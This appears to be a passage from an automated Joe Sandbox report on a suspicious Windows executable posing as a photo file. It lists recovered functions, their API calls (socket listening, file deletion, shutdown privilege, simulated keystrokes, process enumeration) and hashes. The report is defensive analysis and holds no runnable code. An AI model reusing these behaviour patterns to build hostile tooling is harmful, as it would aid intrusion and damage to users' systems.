                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                      • API String ID: 2234035333-3163812486
                                                                      • Opcode ID: d423fcff1333e4171c02fb1500055fcb05b5d23f54f92e500dfcbcceab2f1639
                                                                      • Instruction ID: 6ca92145b5912d3d73e712e78ee1bc4e4cca0968faac00f969ad24b386d4c501
                                                                      • Opcode Fuzzy Hash: d423fcff1333e4171c02fb1500055fcb05b5d23f54f92e500dfcbcceab2f1639
                                                                      • Instruction Fuzzy Hash: F201D6726603316BF72822B89C8ABBE739CDB49351F188565FD06E62D1E5609C4082B1
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000001,00000006), ref: 00D9119D
                                                                      • WSAGetLastError.WSOCK32 ref: 00D911AA
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00D911E1
                                                                      • WSAGetLastError.WSOCK32 ref: 00D911EC
                                                                      • closesocket.WSOCK32(00000000), ref: 00D9121B
                                                                      • listen.WSOCK32(00000000,00000005), ref: 00D9122A
                                                                      • WSAGetLastError.WSOCK32 ref: 00D91234
                                                                      • closesocket.WSOCK32(00000000), ref: 00D91263
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                      • String ID:
                                                                      • API String ID: 540024437-0
                                                                      • Opcode ID: ba8a224f6e170f1ed34d18a2e7196d788fcaa15b3a8e51708e211bd186332226
                                                                      • Instruction ID: fd7def09188c980d00173ef24891aa4e71eb1567c7db76cc8c3337c3263f86dd
                                                                      • Opcode Fuzzy Hash: ba8a224f6e170f1ed34d18a2e7196d788fcaa15b3a8e51708e211bd186332226
                                                                      • Instruction Fuzzy Hash: 3B417F35A00211AFDB10EF64D485B65BBE5BF46328F188198E8569F392C771EC81CBB1
                                                                      APIs
                                                                        • Part of subcall function 00D1592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D15922,?,?,00D148AA,?,?,?,00000000), ref: 00D1594D
                                                                        • Part of subcall function 00D7E0B7: GetFileAttributesW.KERNEL32(?,00D7CEB3), ref: 00D7E0B8
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00D7D33E
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00D7D38E
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D7D39F
                                                                      • FindClose.KERNEL32(00000000), ref: 00D7D3B6
                                                                      • FindClose.KERNEL32(00000000), ref: 00D7D3BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 2649000838-1173974218
                                                                      • Opcode ID: 698a83b776a4090d2574515c6d8a02ab93d5b925752e4cd6cbfb1f5ed6c15a05
                                                                      • Instruction ID: e236e2dda291c3c0637e9fc14a9f6ccdfcef4f9bafdd92897ddb19dec939a05d
                                                                      • Opcode Fuzzy Hash: 698a83b776a4090d2574515c6d8a02ab93d5b925752e4cd6cbfb1f5ed6c15a05
                                                                      • Instruction Fuzzy Hash: 62319C31019345ABC200EF64E8919EFB7E8AE92310F445A1EF4D592191EF30DA49CBB7
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: __floor_pentium4
                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                      • API String ID: 4168288129-2761157908
                                                                      • Opcode ID: 3b478adfef3658520964eb2e9450e1000d740fea1c7ed8bed269fe8a9d0dfc73
                                                                      • Instruction ID: cff8d07a794eddf5b1ce6236f7b354d91f4ca53c33ea7f409e02add4fd7381b6
                                                                      • Opcode Fuzzy Hash: 3b478adfef3658520964eb2e9450e1000d740fea1c7ed8bed269fe8a9d0dfc73
                                                                      • Instruction Fuzzy Hash: 8BC22772E046289FDB25CF289D407EAB7B5FB84305F1941EAD84DE7250E774AE818F60
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00D863FA
                                                                      • CoInitialize.OLE32(00000000), ref: 00D86557
                                                                      • CoCreateInstance.OLE32(00DAFD14,00000000,00000001,00DAFB84,?), ref: 00D8656E
                                                                      • CoUninitialize.OLE32 ref: 00D867F2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                      • String ID: .lnk
                                                                      • API String ID: 886957087-24824748
                                                                      • Opcode ID: f119581c21566aa0c651265c5132103218b43109ee34dfc2da70d69022098453
                                                                      • Instruction ID: 7e36d9e2d29f9dfd2fba9cff27d4aef89f8c48af2bfd19a07c0c423666b54542
                                                                      • Opcode Fuzzy Hash: f119581c21566aa0c651265c5132103218b43109ee34dfc2da70d69022098453
                                                                      • Instruction Fuzzy Hash: 1CD13571608301AFC310EF24D881DAAB7E8FF89714F04496DF5958B2A1DB70E949CBB2
                                                                      APIs
                                                                        • Part of subcall function 00D1B606: _wcslen.LIBCMT ref: 00D1B610
                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00D89A96
                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00D89BA9
                                                                        • Part of subcall function 00D83792: GetInputState.USER32 ref: 00D837E9
                                                                        • Part of subcall function 00D83792: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D83884
                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00D89AC6
                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00D89B93
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                      • String ID: *.*
                                                                      • API String ID: 1972594611-438819550
                                                                      • Opcode ID: b941abe78b5bd40a538ebe5c83fc04647cae616446fa1644fe1f4f1771019f95
                                                                      • Instruction ID: 176538f6db26d9917f7673cfc3455e9139dbe0c992817abbc7eb6ecb3dd1445e
                                                                      • Opcode Fuzzy Hash: b941abe78b5bd40a538ebe5c83fc04647cae616446fa1644fe1f4f1771019f95
                                                                      • Instruction Fuzzy Hash: B5415171901209AFCF14EFA4DC95AEEBBB4EF45350F284056E845A3191DB31AE84CF70
                                                                      Strings
                                                                      • VUUU, xrefs: 00D569C6
                                                                      • VUUU, xrefs: 00D19DA8
                                                                      • VUUU, xrefs: 00D19D66
                                                                      • ERCP, xrefs: 00D19AAC
                                                                      • 665dad7364a5f1ca51da91a372415b92c259ab973f0714e62f2096e2c2d76cefda11b2ca87de3ae337683726e470a833bfd0f8df2909bb2d76ae13d1a678c6e642, xrefs: 00D568E5
                                                                      • VUUU, xrefs: 00D19D54
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 665dad7364a5f1ca51da91a372415b92c259ab973f0714e62f2096e2c2d76cefda11b2ca87de3ae337683726e470a833bfd0f8df2909bb2d76ae13d1a678c6e642$ERCP$VUUU$VUUU$VUUU$VUUU
                                                                      • API String ID: 0-2508159638
                                                                      • Opcode ID: a03d43998be09cc1baf58962b8f8b2306fbe41f40a9a8a549efc407e6a95bae0
                                                                      • Instruction ID: c6f96e6214307fb329b33f56d8538e46b8e4eb69597b9d31e780028aee2c0b8c
                                                                      • Opcode Fuzzy Hash: a03d43998be09cc1baf58962b8f8b2306fbe41f40a9a8a549efc407e6a95bae0
                                                                      • Instruction Fuzzy Hash: 52A29D70E0421A9BDF24CF58D9607EDB7B1AF54311F6881AAEC55A7280EB30DDC5CBA1
                                                                      APIs
                                                                        • Part of subcall function 00D2B021: GetWindowLongW.USER32(?,000000EB), ref: 00D2B032
                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00D2AECE
                                                                      • GetSysColor.USER32(0000000F), ref: 00D2AFA3
                                                                      • SetBkColor.GDI32(?,00000000), ref: 00D2AFB6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Color$LongProcWindow
                                                                      • String ID:
                                                                      • API String ID: 3131106179-0
                                                                      • Opcode ID: dc249267a23495ef87da86862945d69a2ce0e716ea189585f171e0cced9ac605
                                                                      • Instruction ID: beb71d6bf821defed07679522bedf0e6013c7c0594397e94576778e488cf0cfb
                                                                      • Opcode Fuzzy Hash: dc249267a23495ef87da86862945d69a2ce0e716ea189585f171e0cced9ac605
                                                                      • Instruction Fuzzy Hash: 06A14BB0205660BFD728AA3CAD98E7F375DDF67348F190605F542CA291CA29DD42E273
                                                                      APIs
                                                                        • Part of subcall function 00D92F75: inet_addr.WSOCK32(?), ref: 00D92FA1
                                                                        • Part of subcall function 00D92F75: _wcslen.LIBCMT ref: 00D92FC2
                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00D91784
                                                                      • WSAGetLastError.WSOCK32 ref: 00D917AB
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00D91802
                                                                      • WSAGetLastError.WSOCK32 ref: 00D9180D
                                                                      • closesocket.WSOCK32(00000000), ref: 00D9183C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 1601658205-0
                                                                      • Opcode ID: 15429c9d01e2d576482393f1e9faf0092a0db204f1b6f45d1f78ff539557c284
                                                                      • Instruction ID: 4ed09d95c6adc6028833bb9473fcce25ef19f761482a0b4fb9cdcb70ac72cbf7
                                                                      • Opcode Fuzzy Hash: 15429c9d01e2d576482393f1e9faf0092a0db204f1b6f45d1f78ff539557c284
                                                                      • Instruction Fuzzy Hash: 1651D379A00210AFDB10EF64D886F6A77E5EB45718F488058F9059F3D3DA71AD428BF1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                      • String ID:
                                                                      • API String ID: 292994002-0
                                                                      • Opcode ID: 1c37bd0e6fda38494697cd1ae6ee49e826e8501ee6a09d7a8ef5ad5744ffa6f9
                                                                      • Instruction ID: 092981709228932402195e51add61a555a80074c23c49e8ed385167bd947f28e
                                                                      • Opcode Fuzzy Hash: 1c37bd0e6fda38494697cd1ae6ee49e826e8501ee6a09d7a8ef5ad5744ffa6f9
                                                                      • Instruction Fuzzy Hash: 632180357402105FD7209F1AC854B6ABBA5EF97320F1D8468E845CB251DB75EC42CBB0
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00D9A5D3
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00D9A5E1
                                                                        • Part of subcall function 00D1B606: _wcslen.LIBCMT ref: 00D1B610
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00D9A6C3
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D9A6D2
                                                                        • Part of subcall function 00D2D5DC: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00D54062,?), ref: 00D2D606
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                      • String ID:
                                                                      • API String ID: 1991900642-0
                                                                      • Opcode ID: 07698809f065f0f617fe2b7c7748f6aaf9764dff7968248faab34681581dbe82
                                                                      • Instruction ID: 25267da092e4e2b92fb0e4c320c27a3b0b6456bb6b4689017c473c89e195e9e2
                                                                      • Opcode Fuzzy Hash: 07698809f065f0f617fe2b7c7748f6aaf9764dff7968248faab34681581dbe82
                                                                      • Instruction Fuzzy Hash: CD515B71508300AFC710EF24D886A9BBBE8FF99754F40892EF58597251EB70D945CBB2
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00D7A9CA
                                                                      • SetKeyboardState.USER32(00000080), ref: 00D7A9E6
                                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00D7AA54
                                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00D7AAA6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: 78a7f432bf59156336d42008f1ed320cebd277304f2c8ecc9d8efc1e44d90887
                                                                      • Instruction ID: 39b52a5a50698336daf7b1af9edf85634c6148de8f52b56c3e3febd66cf01838
                                                                      • Opcode Fuzzy Hash: 78a7f432bf59156336d42008f1ed320cebd277304f2c8ecc9d8efc1e44d90887
                                                                      • Instruction Fuzzy Hash: AF311630A40258AEFF30CA68C905BFE7BA5AB85320F08C21AE589961D1E374CD45C7B6
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00D4BB1F
                                                                        • Part of subcall function 00D42958: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4D771,00000000,00000000,00000000,00000000,?,00D4D798,00000000,00000007,00000000,?,00D4DB95,00000000), ref: 00D4296E
                                                                        • Part of subcall function 00D42958: GetLastError.KERNEL32(00000000,?,00D4D771,00000000,00000000,00000000,00000000,?,00D4D798,00000000,00000007,00000000,?,00D4DB95,00000000,00000000), ref: 00D42980
                                                                      • GetTimeZoneInformation.KERNEL32 ref: 00D4BB31
                                                                      • WideCharToMultiByte.KERNEL32(00000000,?,00DE121C,000000FF,?,0000003F,?,?), ref: 00D4BBA9
                                                                      • WideCharToMultiByte.KERNEL32(00000000,?,00DE1270,000000FF,?,0000003F,?,?,?,00DE121C,000000FF,?,0000003F,?,?), ref: 00D4BBD6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                      • String ID:
                                                                      • API String ID: 806657224-0
                                                                      • Opcode ID: 029792f6461b53520233a42c09d7c4402bc79f340e0fd7e50a297f560f2b3559
                                                                      • Instruction ID: 68e1f36bcc7ab45ff9830566d303cb03bcbb5c8cfa6775fd6ba10cc79a80a05c
                                                                      • Opcode Fuzzy Hash: 029792f6461b53520233a42c09d7c4402bc79f340e0fd7e50a297f560f2b3559
                                                                      • Instruction Fuzzy Hash: B4319A71A04385DFCB11EF69CC8292ABBB8FF2632071846AAE150DB3A5D770D941CB74
                                                                      APIs
                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00D8CDA7
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00D8CE08
                                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 00D8CE1C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorEventFileInternetLastRead
                                                                      • String ID:
                                                                      • API String ID: 234945975-0
                                                                      • Opcode ID: a0a171896a82b5703f87f1795e3336fcb922ab53d7f41417ae7463453a1a0330
                                                                      • Instruction ID: 9b97e1fd3a5adefaea1cfa15f4e4f44ab9f0cfcf7a960f827f6582edab133d86
                                                                      • Opcode Fuzzy Hash: a0a171896a82b5703f87f1795e3336fcb922ab53d7f41417ae7463453a1a0330
                                                                      • Instruction Fuzzy Hash: E6218C71520305EBDB21EF65C848BAAB7FCEB40314F14942AE54696651E774EA048BB0
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,00D55DF8), ref: 00D7DAEC
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00D7DAFB
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00D7DB0C
                                                                      • FindClose.KERNEL32(00000000), ref: 00D7DB18
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                      • String ID:
                                                                      • API String ID: 2695905019-0
                                                                      • Opcode ID: 4348e2691935d10b2920c441f8f9734614090618042ca4219f5b261fd62c2c79
                                                                      • Instruction ID: fd88113834d9db4c9250ce14a1152f86ea27ad0eba74dc8333fd33738d41302a
                                                                      • Opcode Fuzzy Hash: 4348e2691935d10b2920c441f8f9734614090618042ca4219f5b261fd62c2c79
                                                                      • Instruction Fuzzy Hash: 30F0E532420B1057C210677CAC0D9AA37BD9E02334B148706F879C22F0EB70AD9446B9
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00D78200
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen
                                                                      • String ID: ($|
                                                                      • API String ID: 1659193697-1631851259
                                                                      • Opcode ID: e45bd545e7bf8e8a92c0ecab7db88b4cbf0498d4eae43f033d9f32faf4662cdd
                                                                      • Instruction ID: e58f5e235b1e113b930e44d6c2815eba3259c5502fc090abf35cee68d0ff836f
                                                                      • Opcode Fuzzy Hash: e45bd545e7bf8e8a92c0ecab7db88b4cbf0498d4eae43f033d9f32faf4662cdd
